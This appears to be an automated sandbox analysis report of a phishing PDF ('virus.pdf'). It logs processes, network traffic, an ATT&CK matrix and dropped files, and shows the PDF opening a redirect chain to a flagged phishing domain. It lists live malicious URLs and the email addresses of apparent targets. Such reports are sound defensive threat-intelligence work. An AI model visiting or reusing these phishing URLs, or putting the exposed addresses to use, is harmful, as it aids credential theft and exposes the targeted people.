    Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49697 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7032_223180313
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7032_223180313
    Source: classification engineClassification label: mal64.phis.winPDF@36/54@11/179
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6356
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-17 21-17-47-465.log
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\virus.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1604 --field-trial-handle=1568,i,7923655495327458657,17984682865062963080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,13355097746480612969,17419181852337752689,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:3
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1604 --field-trial-handle=1568,i,7923655495327458657,17984682865062963080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,13355097746480612969,17419181852337752689,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: virus.pdfInitial sample: PDF keyword /JS count = 0
    Source: virus.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: virus.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformation

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions    		1
    Process Injection    		11
    Masquerading    		OS Credential Dumping1
    Process Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Extra Window Memory Injection    		1
    Process Injection    		LSASS Memory1
    System Information Discovery    		Remote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    File Deletion    		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Extra Window Memory Injection    		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer    		Traffic DuplicationData Destruction

    Screenshots

    Download Video

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN?S=bjones@lakeland.cc.il.us100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.us100%Avira URL Cloudmalware
    https://khfreightgroup.com/favicon.ico0%Avira URL Cloudsafe
    https://khfreightgroup.com/wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png0%Avira URL Cloudsafe
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.js100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js100%Avira URL Cloudmalware
    https://a.nel.cloudflare.com/report/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D0%Avira URL Cloudsafe
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.js100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.css100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.js100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.us100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.js100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.js100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.css100%Avira URL Cloudmalware
    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.us100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    sdspprfd-tftfrtrghf34f3drrs3.net
    		104.21.64.1
    		truefalse
      		high
      a.nel.cloudflare.com
      		35.190.80.1
      		truefalse
        		high
        e8652.dscx.akamaiedge.net
        		92.123.21.129
        		truefalse
          		high
          edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
          		217.20.57.20
          		truefalse
            		high
            www.google.com
            		142.250.185.196
            		truefalse
              		high
              khfreightgroup.com
              		192.185.25.215
              		truetrue
                		unknown
                x1.i.lencr.org
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.ustrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://khfreightgroup.com/favicon.icofalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.ustrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://khfreightgroup.com/wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.pngfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2true
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN?S=bjones@lakeland.cc.il.ustrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.csstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.jstrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzfalse
                    		unknown
                    https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.ustrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.csstrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://a.nel.cloudflare.com/report/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3Dfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    142.250.186.46
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    3.219.243.226
                    		unknownUnited States
                    		14618AMAZON-AESUSfalse
                    92.123.21.129
                    		e8652.dscx.akamaiedge.netEuropean Union
                    		16625AKAMAI-ASUSfalse
                    1.1.1.1
                    		unknownAustralia
                    		13335CLOUDFLARENETUSfalse
                    217.20.57.20
                    		edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comDenmark
                    		15516DK-DANSKKABELTVDKfalse
                    104.21.64.1
                    		sdspprfd-tftfrtrghf34f3drrs3.netUnited States
                    		13335CLOUDFLARENETUSfalse
                    172.217.18.3
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    142.250.185.227
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    192.185.25.215
                    		khfreightgroup.comUnited States
                    		46606UNIFIEDLAYER-AS-1UStrue
                    142.251.168.84
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    142.250.185.196
                    		www.google.comUnited States
                    		15169GOOGLEUSfalse
                    142.250.185.174
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    35.190.80.1
                    		a.nel.cloudflare.comUnited States
                    		15169GOOGLEUSfalse
                    92.123.20.204
                    		unknownEuropean Union
                    		16625AKAMAI-ASUSfalse
                    172.217.16.195
                    		unknownUnited States
                    		15169GOOGLEUSfalse
                    172.64.41.3
                    		unknownUnited States
                    		13335CLOUDFLARENETUSfalse
                    172.217.16.142
                    		unknownUnited States
                    		15169GOOGLEUSfalse

                    Private

                    IP
                    192.168.2.16
                    192.168.2.15

                    General Information

                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1641117
                    Start date and time:2025-03-18 02:17:14 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:18
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Sample name:virus.pdf
                    Detection:MAL
                    Classification:mal64.phis.winPDF@36/54@11/179
                    Cookbook Comments:
                    • Found application associated with file extension: .pdf
                    • Exclude process from analysis (whitelisted): svchost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.185.174, 142.250.185.227, 142.250.186.46, 142.251.168.84, 92.123.20.204, 142.250.185.110, 3.219.243.226, 52.22.41.97, 3.233.129.217, 52.6.155.20, 142.250.184.238, 172.64.41.3, 162.159.61.3
                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, clientservices.googleapis.com, clients.l.google.com, p13n.adobe.io, geo2.adobe.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: khfreightgroup.com

                    Created / dropped Files

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):290
                    Entropy (8bit):5.2435144629074735
                    Encrypted:false
                    SSDEEP:
                    MD5:EC581CEBB43FC2CDC8BFBE96ABACE271
                    SHA1:014F850ED0411456B001DB61BF799BC394686B67
                    SHA-256:1AE5668901F8379F9CF6A67C2474386467D13E44CEDAB59B2338E64D85BF7B8B
                    SHA-512:AEF90E46ECC9900D3501515345960D6CB33BED6395BEF3C77B8741C66152317923FA07532C4D42FA623FD19D6177551D9AFA1968B52EEE12309DAD94BE69C02E
                    Malicious:false
                    Reputation:unknown
                    Preview:2025/03/17-21:17:45.441 1948 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/17-21:17:45.443 1948 Recovering log #3.2025/03/17-21:17:45.444 1948 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):334
                    Entropy (8bit):5.137866221463094
                    Encrypted:false
                    SSDEEP:
                    MD5:A0CFED5DA89300A571006C9D91765F3D
                    SHA1:3BDAC38AEF7101A47EC2446E9D74C742A2C8BD25
                    SHA-256:7DA27F812BE20B25789F86C5E60B807B127469C58809AB4A876558CD455F81E9
                    SHA-512:FD2B27E6F2609D6FDC3730AE2DFC8A40B5BBBF3F3A22329ABFBF9F0984B60CEF6A93B0888EF14C9A0E1DE371ED204D834F0611BDBA8724C826C293DB70ED0879
                    Malicious:false
                    Reputation:unknown
                    Preview:2025/03/17-21:17:45.120 1a04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/17-21:17:45.124 1a04 Recovering log #3.2025/03/17-21:17:45.124 1a04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4247a010-d08c-49fb-b524-d28c290a6313.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):403
                    Entropy (8bit):4.99670747027479
                    Encrypted:false
                    SSDEEP:
                    MD5:CFADACBD435AB68679A273F8E9251681
                    SHA1:4E118F3120DF0D7AC72095D8BAE109E0A70511B6
                    SHA-256:FC745DB9D247A221D7ADB00EB6E700F46AAD5420A026C8A4FC08FD3BB600A319
                    SHA-512:70BBAB8F78D3213F37891086A8904EF8EB120630F841EF144C9DDDDF56B4B31E3BAF3B9312B148A4635705BD21DE4504E46D962DF03765C2292701663E0645DE
                    Malicious:false
                    Reputation:unknown
                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386820670975036","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":465670},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\81babc9d-fdbe-4570-befb-f7e9d5098d78.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):403
                    Entropy (8bit):4.953858338552356
                    Encrypted:false
                    SSDEEP:
                    MD5:4C313FE514B5F4E7E89329630909F8DC
                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                    Malicious:false
                    Reputation:unknown
                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:4C313FE514B5F4E7E89329630909F8DC
                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                    Malicious:false
                    Reputation:unknown
